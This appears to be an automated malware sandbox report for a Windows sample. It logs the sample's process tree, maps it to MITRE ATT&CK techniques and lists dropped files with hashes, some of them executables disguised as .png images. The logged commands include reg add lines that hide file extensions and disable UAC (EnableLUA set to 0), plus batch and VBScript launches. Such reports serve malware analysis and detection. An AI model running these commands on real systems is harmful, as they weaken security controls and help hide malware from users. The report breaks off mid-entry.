        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        23⤵
        
        PID:2968
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        20⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4948
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        20⤵
        
        PID:2676
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        20⤵
        Modifies registry key
        
        PID:920
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GcYoQgIY.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        20⤵
        
        PID:1184
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        21⤵
        
        PID:2972
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        18⤵
        
        PID:868
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        18⤵
        
        PID:3168
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        18⤵
        
        PID:816
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gmUMIYcA.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        18⤵
        
        PID:4476
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        19⤵
        
        PID:1140
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        16⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3084
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        16⤵
        
        PID:1488
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        16⤵
        UAC bypass
        Modifies registry key
        
        PID:4636
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kgkgwIEY.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        16⤵
        
        PID:3860
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        17⤵
        
        PID:3192
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        14⤵
        
        PID:3968
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        14⤵
        
        PID:4652
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        14⤵
        UAC bypass
        
        PID:2572
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\naEYwYEQ.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        14⤵
        
        PID:2936
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        15⤵
        
        PID:4600
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        12⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1560
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        12⤵
        
        PID:4116
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        12⤵
        Modifies registry key
        
        PID:1320
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VosQksgA.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        12⤵
        
        PID:3232
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        13⤵
        
        PID:2752
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        10⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4036
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        10⤵
        
        PID:2372
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        10⤵
        
        PID:2080
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Dswcokkk.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        10⤵
        
        PID:4312
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        11⤵
        
        PID:4284
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        8⤵
        Modifies visibility of file extensions in Explorer
        
        PID:796
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        8⤵
        
        PID:4912
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        8⤵
        UAC bypass
        
        PID:2676
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GscYsYow.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        8⤵
        
        PID:3596
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        9⤵
        
        PID:1080
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        6⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4400
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        6⤵
        
        PID:2740
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        6⤵
        
        PID:2436
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EqIUIEkM.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        6⤵
        
        PID:2208
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        7⤵
        
        PID:2412
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
      4⤵
      PID:368
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
      4⤵
      Modifies registry key
      PID:2608
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
      4⤵
      UAC bypass
      PID:988
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WscYAwAw.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4336
    - - C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        5⤵
        
        PID:3996
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  - Modifies registry key
  PID:2288
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:3428
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  - UAC bypass
  PID:2752
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IcUMAcgE.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2672
- - C:\Windows\SysWOW64\cscript.exe
    cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
    3⤵
    PID:2156

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\BuwEMkMQ\aQksIwQY.exe

Filesize
111KB

MD5
0b5dcef530c9dd8830e50917d6211bbf

SHA1
769be10270882f4d8894e2f1036dd4a399d34e74

SHA256
a1599ce76010627ee9d3b2329e58fed375be10c5fd432eb273c36645601b0399

SHA512
14b853080a87158f4f6fbee9fcbde8e76b459dbcd198c2de5ee261eaa25f84c5522c3ef7f551016dd48d174bc0e88c6964884d8f2b67bffa236387734bbf396e

Download Submit
C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png.exe

Filesize
241KB

MD5
e7a1300a6808e9b76efc82e6fb3a28ac

SHA1
7f93643c3e0180bc1a4e8caaa2d79379e54be503

SHA256
e4d8ba19bfe3673f0603062b6d86610b4d3d7b7d05e7f574318d5260dcfea842

SHA512
49a19e6265dd16578f581e5fd15497ee54d44367016e88009066ca6191d089e1d6829496279a7f4ebc86823b018e7fabbaf028b8185a72e3a5e82b7644fe60a7

Download Submit
C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png.exe

Filesize
138KB

MD5
77223d8f716bf8444fe6cbd0c03359f4

SHA1
86ae663839d8b9121dae4eab3c26e14ea735e850

SHA256
2a2ae706c2e4220b21aa0c563c17c974cc4b7d955ae4c8d306b27aa197cf4bf6

SHA512
b525ce94bcbdac253ba26c770e4aa1434f422989e72125f685c8b01581eeeb933f867029f8e0db6f1556b9e2f328b7fd9ea65d3083b3b157c70726d00eb472c0

Download Submit
C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png.exe

Filesize
149KB

MD5
4581af0f36cfa2c93d2c370e688e0137

SHA1
382ed32881dc7ac2891015e33dcc4cc7167d9547

SHA256
5977597afab2ae0b06298eed46baaf3f45812e89379597603d2758e19366a0ee

SHA512
0c9227d509b477c90c1778802d92153764b014ee4de13c1481c49cf7e03b4939564562dae34ddaef415bf7a1a4768fbb4b266cf6437d26d63669836ec32df61a

Download Submit
C:\ProgramData\Microsoft\User Account Pictures\user-192.png.exe

Filesize
113KB

MD5
aa24d63c61020f5d8f137928cccfdb81

SHA1
a8407af681275b7644751048eb8c9a4f8431de92

SHA256
6407518cd45465dbaf9d7f25c944669cc4ae74b62814e844488c98109e83a396

SHA512
957461029a952cf26c76bd1bc2e3bf8d742bd2034a65d7e2c2f62ace96314780819cc4d8d9caed2b9c234c894619640293045439e9231ffb5535b1c472278bce

Download Submit
C:\ProgramData\Microsoft\User Account Pictures\user-40.png.exe

Filesize
112KB

MD5
c1151a29d6460bb8604a5a9e3908c3aa

SHA1
6d1cb8712137787f50d8ba158b45ce8cccf13d57

SHA256
c4d63c661b0ded7b79be3ffb24e86a7fbabcfb28554cc6dcd7cb2bef01674873

SHA512
b1f69bc09d0492bc5eda01675e33056cd1630daf541470ac497a70726fe2ca7c3988b6d0c61154928a4876e4dd38923e2d9ad2b2eeb6d467d4c7d04656254350

Download Submit
C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe

Filesize
557KB

MD5
f19cde32eb4a8c4c6d4293f36bb51d49

SHA1
ece64183921ddbd71b73fa664f9254b89d6a8695

SHA256
ee6732264ce973d4036789959ec40d97a591693dbe97191b71edcde0647ea1bc

SHA512
13efb75e2998f705b8f739e5c75e1b7a864c16586740cc75542f2138b42afec2961c043e554288f437fe53ec926661e1b33452d6366edf9bfd059b936ed983d0

Download Submit
C:\ProgramData\Package Cache\{63880b41-04fc-4f9b-92c4-4455c255eb8c}\windowsdesktop-runtime-8.0.2-win-x64.exe

Filesize
721KB

MD5
9b495f0a5c849c261b15cee84b29ad18

SHA1
49f56dd56e0086313f59dcc8944da40c4280b91a

SHA256
f2c8065a13064902faba6a4870b3c79931bdf24c2d2f896c2ca4d0c7c9557b06

SHA512
9325962554879a603f58eafd3bca08ba5df1b1e38950a56f646864c7ad37f3e6198fa9516c7b92c8e77fb4ac5be4aea2735f997d59dafc6adce75783d487fe60

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AppErrorWhite.png.exe

Filesize
118KB

MD5
baafd25c9d3ed707855e07befefe8407

SHA1
92f407f8bd51e150a936b9c29d2a6f5ae7efb202

SHA256
1b08cae473e3def97bdfe68b3939323f4da03ac62e454f45c9fdd5e1d17102ad

SHA512
0fd77dd87b37e8a82af950f395183b950510a2a6af781eb7be3fdf74a00a2b52bdda3f57fb1f6a75ae7317cc98203694a4993907648342d9fb7b5ada2a4b2370

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ElevatedAppBlue.png.exe

Filesize
119KB

MD5
0dee80db704bae8375c1444e3dce0bc9

SHA1
9fe8c998b63de0ebb72d2710cab355f7b8103d37

SHA256
2e28cd0afee40cd5505467875bfcf772e60325c62b84aed75afae82aeea77f97

SHA512
16b0a5dedc27f9b01fa4d6243ce5188c68b91b517b02c33d3e5432f2b77489a9283fd89a71a0191ad30e0e989b05603393d26d1cdfc072a625db5218d8a32147

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\QuotaCritical.png.exe

Filesize
119KB

MD5
bf7b70092121e196fa0eb90ca4c9c32d

SHA1
17aaf7aef2362b43e3996b69b7f4d860420d10f3

SHA256
3bc3d946f5db85729f3a753668d849e48b3bf73616a371623fd457881e465d01

SHA512
070a4d43147bb26000cced787c9b44e18530e8ec9ef9f3f276936040e8e2b10a287a640f47dd5b2654767f346e22bfed2967ef006800c7d8fcbc370b87e88708

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-150.png.exe

Filesize
111KB

MD5
0bcc4ae703854b549783c83886cc3cfd

SHA1
f5ba38933d1d00300fc5b41885e1e4d6f6b72c05

SHA256
8993b093eaccded3a998bf9d226badd09d2cef974c4b46a583bdd64422fd03d7

SHA512
dcb0b734677727f418e85875ce88dbaafb98aee44499993854e4d4fabe6d7889abe6a2d638c96d61876493b64dea35e10ea67a6943eafa8dbf4c57c7f813abfa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe

Filesize
1.7MB

MD5
9d8df77edcd30af45f34f4203b9998dd

SHA1
bd21d5489abd8f4c10d20ea11480f38a7d9ebd1c

SHA256
a1c0148fabd55a76a650efddf249c582a5960258aab1f381634555321e3d8cf8

SHA512
02d96e4e4cfb76045cd8424cc097d0776db706694607ddc875b75bd1708fb867ee8590cc597139cc13a941ed5bf727ad4695bbac83aa5a46f9ebc3e258aa0d32

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\6501008900\squaretile.png.exe

Filesize
111KB

MD5
ce13197d43090ee953a7bd694ad30d53

SHA1
492128c299078b9ad45f7aa473261c6dece26a9d

SHA256
e95cdb888aec469d548ceba927b39b756af28cad947ea40c13df6284c7544ca6

SHA512
6b2e0be3b0f7c0cf533128f4faad03c0f8a8cb201c66371eb4e63dfe06a62f4c5d8be369f6ee9bf7b5a93d7b8ef302435b2ff6f2fbd953937371257da6cae0aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf

Filesize
85B

MD5
5a07aca97e595cda407bdb8a2eb380f5

SHA1
db0b01d62178cb54bd97e8b76e0be4ceb8c6f9c1

SHA256
a932fd307c4bdc223ae39165f413b2a530b2dbf6323e8a272865da6627535ea3

SHA512
8850076cb720a82b3dc4d4e376cf4d90a02bca67e60eeb3b588d8925f9ec95843df432964f523abf912c7bdff25f27574466505caef28d2375c7cf63cd3f1d07

Download Submit
C:\Users\Admin\AppData\Local\Temp\AAkQ.exe

Filesize
5.8MB

MD5
5370cfbfaa802c961e516721d9b76e3f

SHA1
647b8501219ea0975de81cb0fd355be0e9c0c7cc

SHA256
98ae2ca44c87be678c15ee0f64eae2cad845b0c4f8da80d5e09850b793f85f61

SHA512
17d6f0353610266000e7357c82dc0913c35e2fc4794d68548a994144dbec8e66cd8bf200bd3d39f33799afa617fa38a94baa2973c95fe208bff7b3647d8ed208

Download Submit
C:\Users\Admin\AppData\Local\Temp\AEsK.exe

Filesize
555KB

MD5
45dec1d7cf85115bcd809cea92d10e6e

SHA1
37fa27fedbe2593af09988cf3257d69c668fc4cf

SHA256
a2e8e0d6071df5b28efc9388573dd67a4f7907196b255f3b6f01008429219694

SHA512
9ba8bbfcf2829f7613d579bc5737914f3bfc4facafb9aa3a24821b80764d7a2312fd8b1067905a98dda58ac8e319d3038bee39dac53e097534a14dbbb6253461

Download Submit
C:\Users\Admin\AppData\Local\Temp\AgYe.exe

Filesize
115KB

MD5
fb669a5528f7a7c3083e332c8b8e8623

SHA1
76593b703cb517af5dde5bb5674170e076d81bd2

SHA256
224ff63a12746b12bd010930b349ba2788fb1af07c0c3de5a2a4463cb0a8a6b3

SHA512
4cb45ffee7a27f8af240f32fc854e8bea1e95feec6714fc834eb60a08a486c1fd53639b3e18248b4c4eef1926d66af2805d8e37c823dcb65cccb9e768c2d6d6c

Download Submit
C:\Users\Admin\AppData\Local\Temp\AkUK.exe

Filesize
114KB

MD5
64d7bcb487839eab7cdd49865eae6449

SHA1
379e1179f100426ca880642ffacc05be8577fe16

SHA256
b990948dfe7576f902f5df516de5ae0d566ccc7ecd002f4f90e277812b5fd666

SHA512
17424bc9275e5b1a6096b3f473bc20d2851847491e45187dc885e3adba7d2dea64ccb78734d9b3cae62b3cfb3feee038ad5178bf9062cda62af1aa758b1ac184

Download Submit
C:\Users\Admin\AppData\Local\Temp\CAkm.exe

Filesize
113KB

MD5
8b624ff3c006f26958980856fa31db67

SHA1
047bac8a0f46a5462b81669a15232506cd6e6439

SHA256
28340f2b9e5916b552931d0220398bf64e8778d97f7bbeacf13814954bbdf4b5

SHA512
43790147df89af119189bf5c0f90af2bcdbaf23d964f0c1d1d6e66644c3f5d19722c557f2398eaa4d26a84de1101fa6ebb58a15eb7505fddfc5b4507b596a5df

Download Submit
C:\Users\Admin\AppData\Local\Temp\CMMc.exe

Filesize
494KB

MD5
a81e3cc7baf6c33c7c6d73ef53c59ce7

SHA1
968a442980603ccaccaf2da8348d0017cd6e9a4b

SHA256
adf09efb01fb08b568ac2183f02b8f0ddb15e7b3f10c4cefeb3bc871f34eb49d

SHA512
af41cf26e1ab4902c6b9143983b56efecc2e35241ec97908cd26da6afedc80842c262b2b277db440d69bc74da09f90cd13700e8080628e177f76f361d5f7e3c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\CMcO.exe

Filesize
112KB

MD5
2b02af065b4a4c0c709a8de3ccf791dc

SHA1
850c810527e510815d3ab6cb392be6849727cdc3

SHA256
1222da773f86e38a1102e83c32d2411ea1decc7c844198d2991a75931a2203d6

SHA512
cb33917cbc7a521023f167c64c0d5434d975aa3116cf4976ee5ef6dae018846904d1e7cf0dcc13f1cbcfdca23c3cca46649dca2c73a6f874187716882fbde646

Download Submit
C:\Users\Admin\AppData\Local\Temp\CQkE.exe

Filesize
112KB

MD5
0cd38e01e7f938858d9289412b7def22

SHA1
9a14c65e98b7941e54e86ff1f37855fd727dafb5

SHA256
b81e01cd6e31d7a6ac6d85ae84a996eaffe9c10355d4a3ea18d16c2a6f0351a8

SHA512
34acaa7f7b025426d09b8952dc8a8b97d502ddc7d481cdd635c513558ddb7de5543cdf94c017bc17f9c69933bc5bfdec9a900e5d7f5d49e497f2313763b0e244

Download Submit
C:\Users\Admin\AppData\Local\Temp\CkYk.exe

Filesize
153KB

MD5
12e8fd4b8781883af4e40c3dd3fc483d

SHA1
6f8da9eb9b8246989a392db1fc71074ed4438a10

SHA256
6812dcd15185bbb019606303300bfaec39b12833c22c97af64155dc4eab85339

SHA512
a5b9bacd5931d64098ed5f335667046b6b06d5fe6b66fe80d9876900dfc6c08c0dd95ab762195a680504b70b900ebb99139b86678b1de03db68ec66a6f460cba

Download Submit
C:\Users\Admin\AppData\Local\Temp\CkwG.exe

Filesize
114KB

MD5
98e620b8f08f9387385af53d9b9416dd

SHA1
f777fb3b311b7a87b6af9c2c569186a66e18b2b1

SHA256
1202a78acd21bcdfb273cb1997e3c9b0cda9e0eb27f99017127d365f5fa5b6cc

SHA512
9dae301e6d79eaef75501a1d207eac0641d5c1b9ab765abdc103f396f2a36cfb2d7add60479a99226ff3484bf224a8d5c5ee5f41f8a3404d585af433f8f641e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\EIAa.ico

Filesize
4KB

MD5
ac4b56cc5c5e71c3bb226181418fd891

SHA1
e62149df7a7d31a7777cae68822e4d0eaba2199d

SHA256
701a17a9ee5c9340bae4f0810f103d1f0ca5c03141e0da826139d5b7397a6fb3

SHA512
a8136ef9245c8a03a155d831ed9b9d5b126f160cdf3da3214850305d726d5d511145e0c83b817ca1ac7b10abccb47729624867d48fede0c46da06f4ac50cf998

Download Submit
C:\Users\Admin\AppData\Local\Temp\EMwe.exe

Filesize
111KB

MD5
59da45bb8381e803dd9bbc9e24292748

SHA1
b80d15607b09371f05395520872b9a5da039e94e

SHA256
957acdc270f643f78064ff0064e23dc862380e5ac06b494c975733acb6cb3b40

SHA512
889edee10e69d4b46c5cf4c28236221ccdf70be8dba3ed79fd2e779bb5e88e5e1f16fe05af48bf338f26ea496f55407c78df7a89d36c0ef7fb89e2d7e74112b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\EQsI.exe

Filesize
113KB

MD5
aa20795625fa729de865a9f08e9e6189

SHA1
f6f6300069523465634f5ee7cb35795837387cb5

SHA256
5cc7637db2c51b356cc12f4763a791e99e7ec0e65d203aa1833b577160b5595f

SHA512
db0c43f56750b2e56d213273279d8c43d0bdbbf747723d2370978667520440c5d92df8ef218c8cbdcf7bae15188e8087be0869ab5d707a5ef050aa97f1abc7db

Download Submit
C:\Users\Admin\AppData\Local\Temp\EUUe.exe

Filesize
113KB

MD5
5d1d32256766d9055650d16427871331

SHA1
c072ed64e4d5f6e15512bc70766e477a83b27da0

SHA256
8633317094a8250c4858069a8b649258c691ca89fac88a6d0c8175047b2bf312

SHA512
1781f172e2e4a7e126fa760ed708a705fe9d9757c3bd4e0bf81e12b428d8129955a430a8954b76e17a34d9cda86b8bce7f0db0cc3584841d9f5cbea4c099e335

Download Submit
C:\Users\Admin\AppData\Local\Temp\EYMm.exe

Filesize
111KB

MD5
cd18728f3ec5c026bd2bda21973b6716

SHA1
f79e1bd0ff19a5ae2adb58aaf3ac9cfd8c9691b2

SHA256
cecfafd3f18ad498fd4fab2984d064dd6dfb9ccc43d1726af9b8fcdecd9d78f7

SHA512
e0973ee02427907cda37c3a4d8187bec9a244aaa60bbf223e2d4eacd96fc6dea5b6fb52e8d419611a0793a0d9eed876bdf7d36c85164f40b3ae9cc1ed61a7bff

Download Submit
C:\Users\Admin\AppData\Local\Temp\EYUG.exe

Filesize
564KB

MD5
46802477c15159f48d3f20e47ef0d6f5

SHA1
75830abd87ea2b47f505756ad18e366b8aca2cc8

SHA256
1943918aeb54694c027379ea7e6d0ec2507b897db03c5424d2fb58019a7919f4

SHA512
c724ee9b0d34293ee8b06b5fadfd884e5a7987f77429d0ca859b9afda92a6a34b1a27c837a38268a064460aa57f6f4f075d1c5b43b7e77e5bfea32ae9dbc11ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\EgUo.exe

Filesize
469KB

MD5
4b6db74d0dcfc16f2e085ae394ca8516

SHA1
56fbd0d3e53bd6c7608eecf5dfcd3a24df71337e

SHA256
a7faa7f31d5dd356737217b785979dd0118e1c697ff86eba060cb6b513e6c1b2

SHA512
d5500a4a72d66c47d577cefbf9f761db47762aa9abe0359b1ca4670e76d705cd8d00533c155b6d5166a5f693b8eab6058ab65c759c765bae946219887bc0c553

Download Submit
C:\Users\Admin\AppData\Local\Temp\Egog.exe

Filesize
720KB

MD5
08b688172f7b22664fc66fe3aa6b0428

SHA1
ca31351cd869837123a905098a649a28df640160

SHA256
f2a95ffbb9a7cb54f5aa10de1fcd884b4b3d6de3d62745665ef135f854fae4f3

SHA512
f8f2678c34f15488624c4e195b5b888512c9803237f792e309a66f7c566b2a064ea1b1d0909c6ab9d9fe0231f4cc8989614f475871496ff6bb8c31b26098bed5

Download Submit
C:\Users\Admin\AppData\Local\Temp\EwAy.exe

Filesize
747KB

MD5
bf0d9beaf8dd4ef5cca5b1fb4d0ba719

SHA1
ab9c0c19f0d2460818f52c470fe61adeaf13a650

SHA256
45b73e0bf9abe91469c4098b5363534078e462691c9b214eb5276818936fda69

SHA512
c3157cfa052ecb0907e111bdc4b849197cab6ec1c45e5bb7c255c3d81361d0e5000a39ccad5d6c0969e455747e01dc0fc98c4fd107c32779858a5d836736e30f

Download Submit
C:\Users\Admin\AppData\Local\Temp\GEMY.exe

Filesize
112KB

MD5
c827a476c282df60c9711c767a58d944

SHA1
52acebefa203ac4cb92cce83d35eb2d4b019f224

SHA256
bb71f187e4c9bad696affbee579bb48270e98d45515a51e5ed34d249c111f9c0

SHA512
7930967a2f485bd69879192b73cb7a8d51052f16e11df3b59f61ced1143eabb875f8a2b73813bad43eb55c583d92d2544fb8eaec82eb00a162aa183bded35b73

Download Submit
C:\Users\Admin\AppData\Local\Temp\GUcs.exe

Filesize
116KB

MD5
1c6c64b3a9e3152772b1016b6a1ebae0

SHA1
caa6c64695cf0802aa10f99516ccf09c656dafed

SHA256
2a98652cae40a8337711f1a6116c011a30c01ca47ebfe9107085e233d85ff76a

SHA512
